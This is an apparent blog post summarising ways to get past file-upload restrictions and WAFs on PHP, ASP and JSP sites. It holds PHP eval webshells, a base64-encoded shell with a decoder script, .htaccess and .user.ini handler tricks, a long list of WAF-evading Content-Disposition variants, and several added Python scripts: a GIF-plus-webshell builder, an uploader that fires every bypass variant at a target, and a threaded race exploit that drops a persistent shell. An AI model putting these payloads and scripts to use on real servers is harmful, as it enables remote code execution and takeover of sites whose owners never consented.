File upload bypass summary

File upload bypass

There are two kinds of restriction: one implemented in the application code and one enforced by a firewall (WAF). Broadly they are similar, since both test whether the uploaded file is legitimate, but they differ in the details. In practice, once information gathering has shown which protective measures a site uses, the bypass method can be chosen far more accurately.

(this article uses a PHP one-line webshell, the "one sentence Trojan", as its example)

Front-end JS restriction on the file suffix

The front end usually uses JavaScript to limit the upload type and file size. Take the source of upload-labs Pass-01 as an example:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("Please select the file to upload!");
        return false;
    }
    // Define the file types allowed to upload
    var allow_ext = ".jpg|.png|.gif";
    // Extract the extension of the chosen file (everything from the last ".")
    var ext_name = file.substring(file.lastIndexOf("."));
    // Check whether the extension is in the allow list (the check runs only in the browser)
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "This file is not allowed to be uploaded, please upload a " + allow_ext + " type file. The current file type is: " + ext_name;
        alert(errMsg);
        return false;
    }
}

Because this check runs only in the browser, it can be bypassed by intercepting the request and changing the file name or type in a proxy, or simply by disabling JavaScript. A front-end-only restriction offers no real protection.

When only the specified suffixes may be uploaded, the bypass methods are:

1. Disable the JavaScript that checks the file suffix

2. Upload a file with an allowed extension, intercept the request with a proxy and change the file name to a script extension

Content-Type restriction

The back-end code is roughly:

<?php
$allow_content_type = array("image/gif", "image/png", "image/jpeg");
$path = "./uploads";
$type = $_FILES["myfile"]["type"];   // taken from the client-supplied Content-Type of the part

if (!in_array($type, $allow_content_type)) {
    die("File type error!<br>");
} else {
    $file = $path . '/' . $_FILES["myfile"]["name"];
    if (move_uploaded_file($_FILES["myfile"]["tmp_name"], $file)) {
        echo 'Success!<br>';
    } else {
        echo 'Error!<br>';
    }
}
?>

$type = $_FILES["myfile"]["type"];

The only thing checked is $_FILES["myfile"]["type"], which PHP fills in from the Content-Type header of the multipart part. That header is sent by the client and can be set to anything.

1. Intercept the upload and change the part's Content-Type to an allowed value (e.g. image/jpeg) while keeping the script file name

2. Upload a file in a normal image format (so the browser sends an image Content-Type) and change the file name in the intercepted request to a script extension

File suffix blacklist detection

The back-end code is roughly:

<?php
// A real blacklist will be more comprehensive than this
$blacklist = array('php', 'asp', 'aspx', 'jsp');
$path = "./uploads";
// only the text after the last "." is compared against the blacklist
$type = array_pop(explode('.', $_FILES['myfile']['name']));

if (in_array(strtolower($type), $blacklist)) {
    die("File type error!<br>");
} else {
    $file = $path . '/' . $_FILES['myfile']['name'];
    if (move_uploaded_file($_FILES['myfile']['tmp_name'], $file)) {
        echo 'Success!<br>';
    } else {
        echo 'Error!<br>';
    }
}
?>

$type = array_pop(explode('.', $_FILES['myfile']['name']));

Only the text after the last "." is lower-cased and compared with the list, so any name whose final component is not literally one of the listed words passes. The following methods exploit that, together with how the operating system and older PHP versions treat the saved name.

1. Trailing "." and space bypass (Windows only). When Windows creates a file it silently strips a trailing "." or space from the name. If the blacklist contains php, upload a.php. or "a.php " (with a trailing space): the check compares "php." or "php " and finds no match, and Windows saves the file as a.php.

2. ::$DATA bypass (Windows only). On NTFS, "file name::$DATA" refers to the file's default data stream. If the uploaded name is a.php::$DATA, the check sees a suffix that ends in ::$DATA and does not match the blacklist, while Windows treats everything after :: as the stream qualifier and creates the file under the name before it, a.php.

3. Double-write bypass. Some filters remove sensitive substrings from the file name, e.g. str_replace('php', '', $name). If the replacement is not applied recursively, doubling the keyword survives one pass: a.pphphp has its inner "php" removed and becomes a.php.

4. %00 truncation bypass. Upload a.php.jpg, then in the intercepted request add a byte after "php" and set its hex value to 00 (a.php%00.jpg). The blacklist sees the extension "jpg", but the underlying C string functions stop at the NUL byte, so the file is saved as a.php.
Common in ASP programs; it also appears in JSP
Conditions for PHP:
php < 5.3.4
magic_quotes_gpc = Off in php.ini

5. Upload an alternative extension that the server still parses as script, for example:

asp/aspx:
asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr

php:
php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml

jsp:
jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml

Which of these actually execute depends on the handler configuration of the web server (html/htm are useful for stored XSS rather than code execution). Burp Intruder can be used to fuzz the list.
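To see the trailing dot/space, ::$DATA, double-write and %00 behaviours side by side, the following Python script is an added example (not from the original article): it re-implements the blacklist check of the PHP snippet above, emulates a non-recursive str_replace, the pre-5.3.4 NUL truncation and the NTFS name rules, and lists the submitted names that pass the blacklist yet land on disk as .php. The candidate file names are constructed samples.

```python
"""Emulate the suffix blacklist and the name mangling that gets past it.
Added example; the filter mirrors the PHP snippet on the page, the mangling
rules are the Windows/NUL/non-recursive-replace behaviours described above."""

BLACKLIST = {"php", "asp", "aspx", "jsp"}


def php_blacklist_check(filename: str) -> bool:
    """Mirror of in_array(strtolower(array_pop(explode('.', $name))), $blacklist).
    Returns True when the upload is ACCEPTED (last component not blacklisted)."""
    ext = filename.split(".")[-1].lower()
    return ext not in BLACKLIST


def replace_once_filter(filename: str, words=("php",)) -> str:
    """A non-recursive str_replace('php', '', $name): one left-to-right pass,
    so a doubled keyword leaves a fresh 'php' behind."""
    for w in words:
        filename = filename.replace(w, "")
    return filename


def c_string_truncate(filename: str) -> str:
    """PHP < 5.3.4 handed the name to C path functions, which stop at NUL."""
    return filename.split("\x00", 1)[0]


def ntfs_effective_name(filename: str) -> str:
    """Name NTFS actually creates: '::$DATA' names the default stream and is
    dropped, then trailing dots and spaces are stripped (Windows only)."""
    name = filename.split("::$DATA", 1)[0]
    return name.rstrip(". ")


def saved_as(filename: str, windows: bool = True) -> str:
    """Final on-disk name after truncation and (optionally) NTFS rules."""
    name = c_string_truncate(filename)
    return ntfs_effective_name(name) if windows else name


def bypass_candidates():
    """Yield (submitted name, on-disk name) for constructed sample names that
    pass the blacklist yet end up as a .php file on a Windows host."""
    samples = ["a.php.", "a.php ", "a.php::$DATA", "a.php\x00.jpg", "a.jpg"]
    for sub in samples:
        if php_blacklist_check(sub) and saved_as(sub).endswith(".php"):
            yield sub, saved_as(sub)


if __name__ == "__main__":
    for sub, disk in bypass_candidates():
        print(repr(sub), "->", disk)
    print(replace_once_filter("a.pphphp"))   # the double-write case
```

The %00 case is the only one that does not depend on Windows; run `saved_as(name, windows=False)` to see which candidates survive on Linux.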

6. .htaccess and .user.ini bypass of the blacklist

.htaccess usage conditions:

.htaccess only applies to Apache
① AllowOverride All (so that an .htaccess placed in the upload directory is honoured)
② LoadModule rewrite_module modules/mod_rewrite.so (rewrite module on; note that the AddType and SetHandler directives below are actually served by mod_mime and the PHP handler, so what matters most is that .htaccess is read at all)

.htaccess content:

AddType application/x-httpd-php .jpg
Parse every file with the suffix .jpg as PHP
<FilesMatch "BaiZe">
SetHandler application/x-httpd-php
</FilesMatch>
Parse every file whose name contains BaiZe as PHP

.user.ini usage conditions:

.user.ini is read by PHP itself rather than by the web server, so it also works behind Nginx, but only when PHP runs as CGI/FastCGI (for example php-fpm). user_ini.filename must not be empty (the default is .user.ini), and there must be a PHP file in the same directory that can be requested, because the directives are applied when a script in that directory executes. A newly uploaded .user.ini is picked up after user_ini.cache_ttl (default 300 seconds).

.user.ini content:

auto_prepend_file=1.jpg
Include 1.jpg (the uploaded picture horse) at the start of every PHP file in that directory, so the PHP code it contains runs whenever one of them is requested

File header restriction

The back-end code is roughly:

<?php
$allow_mime = array("image/gif", "image/png", "image/jpeg");
// getimagesize() reads the image header from the temp file and reports its MIME type
$imageinfo = getimagesize($_FILES["myfile"]["tmp_name"]);
$path = "./uploads";

if (!in_array($imageinfo['mime'], $allow_mime)) {
    die("File type error!<br>");
} else {
    $file = $path . '/' . $_FILES["myfile"]["name"];
    if (move_uploaded_file($_FILES["myfile"]["tmp_name"], $file)) {
        echo 'Success!<br>';
    } else {
        echo 'Error!<br>';
    }
}
?>

For file-header detection, either upload a picture horse (a real image with the PHP code appended) and change its suffix to a parsable script extension, or prepend a legitimate file header such as GIF89a to the one-line webshell. getimagesize() only looks at the image header, so the PHP code that follows it is never inspected.
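How a picture horse satisfies a header check while still carrying PHP, as an added example that is not part of the original article: the script builds a structurally valid 1x1 GIF89a (a bare "GIF89a" prefix is usually enough for getimagesize(), but a real image also survives checks that read the dimensions), appends a PHP payload after the GIF trailer, and sniffs the result the way a magic-byte check does. The payload string is a constructed sample.

```python
"""Build a 'picture horse' (valid GIF + PHP) and check it with a magic-byte
sniffer in the spirit of getimagesize(). Added example, not from the page."""
import struct

PHP_PAYLOAD = b"<?php @eval($_POST['a']); ?>"   # constructed sample one-liner


def minimal_gif(width: int = 1, height: int = 1) -> bytes:
    """A complete GIF89a: header, logical screen descriptor, 2-colour global
    palette, one image block with the standard 1-pixel LZW stream, trailer."""
    header = b"GIF89a"
    # packed field 0x80: global colour table present, 1 bit per pixel (2 colours)
    lsd = struct.pack("<HHBBB", width, height, 0x80, 0, 0)
    palette = b"\x00\x00\x00\xff\xff\xff"
    image_desc = b"\x2c" + struct.pack("<HHHHB", 0, 0, width, height, 0)
    # LZW minimum code size 2, one 2-byte sub-block, then the 0-length terminator
    image_data = b"\x02\x02\x44\x01\x00"
    trailer = b"\x3b"                      # ';' ends the image for any GIF decoder
    return header + lsd + palette + image_desc + image_data + trailer


def picture_horse(payload: bytes = PHP_PAYLOAD) -> bytes:
    """Valid image first, PHP after the trailer: an image parser stops at ';',
    while the PHP engine emits the binary prefix as output and runs the rest."""
    return minimal_gif() + b"\n" + payload


def sniff_mime(data: bytes):
    """Header-only MIME detection, the part of getimagesize() the check relies on."""
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "image/gif"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "image/png"
    if data[:3] == b"\xff\xd8\xff":
        return "image/jpeg"
    return None


def gif_dimensions(data: bytes):
    """Width/height from the logical screen descriptor, as getimagesize reports."""
    return struct.unpack("<HH", data[6:10])


if __name__ == "__main__":
    blob = picture_horse()
    print(sniff_mime(blob), gif_dimensions(blob), PHP_PAYLOAD in blob)
    with open("horse.gif", "wb") as f:      # upload this, then rename/parse it as PHP
        f.write(blob)
```

Note that the file only gives code execution if something parses it as PHP: a renamed extension, an .htaccess AddType rule, or a .user.ini auto_prepend_file entry.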

Dangerous function detection

Generally the WAF inspects the content of the uploaded file for dangerous function names.

1. Use a dynamic call so that no dangerous function name appears literally in the file, for example:

<?php $_GET['0']($_GET['1']);?>

Requesting ?0=system&1=id calls system("id"). This evades signature matching on the file content, but it does not bypass disable_functions: the function named at run time must still be enabled.

2. Upload the webshell in encoded form and use .htaccess to have it decoded and parsed

3. Upload the encoded webshell, then upload a second script that decodes it and writes a new file. For example, the content of 1.php is the base64 encoding of <?php eval($_POST['a']);?>:

PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=

Upload that first, then upload 2.php with the following content:

<?php
$path = "/xx/xxx/xx/1.php";          // absolute path of the encoded file on the server
$str = file_get_contents($path);
$strs = base64_decode($str);
$test = fopen("./test.php", "w");    // write the decoded shell next to 2.php
fwrite($test, $strs);
fclose($test);
?>

Then request 2.php, which writes test.php, and request test.php to get the shell.

WAF interception bypass

The common blacklist bypass methods also work against some WAFs, but more often they have to be combined to get an upload through. The main idea is that the back end and the WAF parse the file name differently: as long as the server still receives and parses the file, the WAF's detection is bypassed.

For example %00 truncation, file name + ";", file name + "'", and uploading .htaccess or .user.ini, which are not repeated here; they should be used in combination with the tricks below.

1. Line-break bypass, e.g.

Content-Disposition: form-data; name="file"; filename="1.p
hp"
Content-Disposition: form-data; name="file"; file
name="1.php"
Content-Disposition: form-data; name="file"; filename=
"1.php"
All three are still accepted by the server

2. Multiple equals signs, e.g.

Content-Disposition: form-data; name="file"; filename==="a.php"

3. Increase the request size, similar to the junk data used to pad SQL injection past a WAF, e.g.

Content-Disposition: form-data; aaaaaaaaaaaaaaaaaaaaa......aaaaaaaaaaaaaaaaaaaaa;name="file"; filename="a.php"

4. Remove or replace the quotation marks, e.g.

Content-Disposition: form-data; name=file1; filename=a.php
Content-Disposition: form-data; name='file1'; filename="a.php"

5. Add an extra filename parameter to interfere with the match, e.g.

Content-Disposition: form-data; name="file"; filename= ;  filename="a.php"

6. Confuse the fields the WAF matches on, for example

Confusing form-data:

Content-Disposition: name="file"; filename="a.php"
(form-data removed)
Content-Disposition: AAAAAAAA="BBBBBBBB"; name="file";  filename="a.php"
(form-data replaced by a junk value)
Content-Disposition: form-data   ; name="file"; filename="a.php"
(spaces after form-data)
Content-Disposition: for+m-data; name="file"; filename="a.php"
(a + inserted inside form-data)

Confusing Content-Disposition:

COntEnT-DIsposiTiOn: form-data; name="file"; filename="a.php"
(case variation)

Content-Type: image/gif
Content-Disposition: form-data; name="file";  filename="a.php"
(Content-Type and Content-Disposition swapped)

Content-Type: image/gif
Content-Disposition: form-data; name="file";  filename="a.php"
Content-Type: image/gif
(extra header: Content-Type duplicated)

AAAAAAAA:filename="aaa.jpg";
Content-Disposition: form-data; name="file";  filename="a.php"
Content-Type: image/gif
(extra header: a junk header carrying a harmless filename)

Content-Length: 666
Content-Disposition: form-data; name="file";  filename="a.php"
Content-Type: image/gif
(extra header: a Content-Length inside the part)

7. Double file bypass. For example, Safedog always takes the value in the last Content-Disposition as the parameter it inspects, while some middleware, such as IIS 6.0, always takes the value in the first Content-Disposition as the one it receives.

8. The container and the WAF differ in how strictly they require the boundary to match

Content-Type: multipart/form-data; boundary=---------------------------471****1141173****525****99
Content-Length: 253
-----------------------------471****1141173****525****99
Content-Disposition: form-data; name="file1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("a")%>
-----------------------------471****1141173****525****99--

Some WAFs treat data enclosed by boundaries that do not match the one declared in the header as meaningless and do not inspect it, while the container is not strict about the match and still receives the data normally.
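All of the part-header tricks above, the boundary mismatch, and the front-end and Content-Type bypasses earlier on the page come down to controlling the raw multipart body byte for byte, which a browser form will never let you do. The following Python script is an added example (not from the original article): it assembles the body by hand so every part header line is sent verbatim, collects the page's header variants in one table, and can emit a body boundary different from the announced one. The target URL, the form field name and the payload are assumptions; sending it against a host you are not authorised to test is not.

```python
"""Hand-built multipart/form-data upload with fully controlled part headers.
Added example, not from the page. TARGET, the field name and PAYLOAD are
assumptions/constructed samples."""
from __future__ import annotations
import http.client
from urllib.parse import urlparse

PAYLOAD = b"<?php @eval($_POST['a']); ?>"            # constructed sample
BOUNDARY = "----WebKitFormBoundaryC4fe2nY5kGxq0pTa"  # arbitrary, browser-like


def build_body(part_headers: list[str], payload: bytes = PAYLOAD,
               boundary: str = BOUNDARY, body_boundary: str | None = None) -> bytes:
    """Assemble one file part. Each entry of `part_headers` is written as-is
    followed by CRLF, so a bare '\\n' inside a header (the line-break trick)
    reaches the wire unchanged. `body_boundary`, when given, is used in the
    body instead of the one the Content-Type header will announce."""
    bb = body_boundary or boundary
    head = "".join(h + "\r\n" for h in part_headers)
    return (f"--{bb}\r\n{head}\r\n").encode() + payload + f"\r\n--{bb}--\r\n".encode()


# Header variants from the page, keyed by the trick each one exercises.
CT = "Content-Type: image/gif"
VARIANTS: dict[str, list[str]] = {
    "baseline":        ['Content-Disposition: form-data; name="file"; filename="a.php"', CT],
    "linefeed":        ['Content-Disposition: form-data; name="file"; filename="1.p\nhp"', CT],
    "double_equals":   ['Content-Disposition: form-data; name="file"; filename==="a.php"', CT],
    "padding":         ['Content-Disposition: form-data; ' + "a" * 8000 + '; name="file"; filename="a.php"', CT],
    "no_quotes":       ["Content-Disposition: form-data; name=file; filename=a.php", CT],
    "double_filename": ['Content-Disposition: form-data; name="file"; filename= ; filename="a.php"', CT],
    "no_form_data":    ['Content-Disposition: name="file"; filename="a.php"', CT],
    "junk_form_data":  ['Content-Disposition: AAAAAAAA="BBBBBBBB"; name="file"; filename="a.php"', CT],
    "header_case":     ['COntEnT-DIsposiTiOn: form-data; name="file"; filename="a.php"', CT],
    "swapped_order":   [CT, 'Content-Disposition: form-data; name="file"; filename="a.php"'],
    "extra_header":    ['AAAAAAAA: filename="aaa.jpg"',
                        'Content-Disposition: form-data; name="file"; filename="a.php"', CT],
}


def upload(url: str, body: bytes, boundary: str = BOUNDARY, timeout: float = 10):
    """Send one crafted request; returns (status, response body). http.client is
    used because higher-level libraries normalise or rebuild the part headers."""
    u = urlparse(url)
    cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = cls(u.netloc, timeout=timeout)
    conn.request("POST", u.path or "/", body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()
    return resp.status, resp.read()


if __name__ == "__main__":
    TARGET = "http://127.0.0.1/upload.php"          # assumed upload endpoint
    for name, headers in VARIANTS.items():
        status, _ = upload(TARGET, build_body(headers))
        print(f"{name:16s} -> {status}")
    # boundary mismatch: header announces BOUNDARY, body uses another one
    print("boundary_mismatch ->", upload(TARGET, build_body(VARIANTS["baseline"], body_boundary="----Other"))[0])
```

Read the response of each variant against the WAF's block page and the application's success message separately: a variant is only useful when the WAF lets it through and the back end still saves a file under the script name.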

9. Race condition. In some cases the server first saves the upload to a directory, then checks it, and then deletes it. Upload a file that, when executed, writes a one-line webshell:

<?php fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>'); ?>

If the uploaded file is requested while it still exists, before the server deletes it, shell6666.php is created and survives the deletion.
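A racer for the save-check-delete pattern just described, as an added example that is not part of the original article: one thread keeps re-uploading the dropper while other threads request it and then probe for the dropped shell. The HTTP transport (UPLOAD_URL, FILE_URL, the form field name upload_file) is an assumption about the target; SimulatedTarget is a constructed stand-in that deletes the upload after a fixed number of requests so the racer can be run offline and the size of the window observed.

```python
"""Race an upload handler that saves, checks, then deletes. Added example,
not from the page. Target URLs/field name are assumptions; SimulatedTarget
is a constructed stand-in for offline runs."""
from __future__ import annotations
import threading
import urllib.error
import urllib.parse
import urllib.request

DROPPER_NAME = "race.php"
SHELL_NAME = "shell6666.php"
# Same idea as the page's one-liner: when executed, write a persistent shell.
DROPPER = b"<?php fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>'); ?>"


class SimulatedTarget:
    """Constructed stand-in: upload() stores the file, every get() counts as a
    request, and the dropper is removed once more than `ttl_requests` requests
    have arrived since the upload. Requesting the dropper while it still
    exists 'executes' it, i.e. creates the shell file."""

    def __init__(self, ttl_requests: int = 3):
        self.files: dict[str, bytes] = {}
        self.ttl = ttl_requests
        self.age = 0
        self.lock = threading.Lock()

    def upload(self, name: str, data: bytes) -> int:
        with self.lock:
            self.files[name] = data
            self.age = 0
            return 200

    def get(self, name: str) -> int:
        with self.lock:
            if DROPPER_NAME in self.files:
                self.age += 1
                if self.age > self.ttl:
                    del self.files[DROPPER_NAME]          # the delete step
            if name == DROPPER_NAME and name in self.files:
                self.files[SHELL_NAME] = b"<?php @eval($_POST[1])?>"
            return 200 if name in self.files else 404


class HttpTarget:
    """Real transport. Assumes a form field named 'upload_file' and that
    uploads are served under file_url (both assumptions about the target)."""

    def __init__(self, upload_url: str, file_url: str):
        self.upload_url, self.file_url = upload_url, file_url

    def upload(self, name: str, data: bytes) -> int:
        b = "----RaceBoundary"
        body = (f'--{b}\r\nContent-Disposition: form-data; name="upload_file"; '
                f'filename="{name}"\r\nContent-Type: image/gif\r\n\r\n').encode()
        body += data + f"\r\n--{b}--\r\n".encode()
        req = urllib.request.Request(self.upload_url, data=body, headers={
            "Content-Type": f"multipart/form-data; boundary={b}"})
        return urllib.request.urlopen(req).status

    def get(self, name: str) -> int:
        try:
            return urllib.request.urlopen(self.file_url + urllib.parse.quote(name)).status
        except urllib.error.HTTPError as e:
            return e.code


def race(target, rounds: int = 200, getters: int = 4) -> bool:
    """Upload the dropper `rounds` times while `getters` threads request it;
    return True as soon as the dropped shell answers 200."""
    won, done = threading.Event(), threading.Event()

    def uploader():
        for _ in range(rounds):
            if won.is_set():
                break
            target.upload(DROPPER_NAME, DROPPER)
        done.set()

    def getter():
        while not won.is_set():
            target.get(DROPPER_NAME)                 # executes it if still on disk
            if target.get(SHELL_NAME) == 200:
                won.set()
            elif done.is_set():                      # one last pass after uploads stop
                break

    threads = [threading.Thread(target=uploader)]
    threads += [threading.Thread(target=getter) for _ in range(getters)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return won.is_set()


if __name__ == "__main__":
    print("window of 3 requests:", race(SimulatedTarget(3)))
    print("window of 0 requests:", race(SimulatedTarget(0)))
    # Live target (assumed URLs): race(HttpTarget("http://127.0.0.1/upload.php", "http://127.0.0.1/uploads/"))
```

Against a real target, raise `rounds` and `getters` until the shell appears; the shorter the server's check window, the more concurrent requests are needed.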


Keywords: Web Development security Cyber Security penetration test

Added by simon551 on Sun, 30 Jan 2022 01:45:28 +0200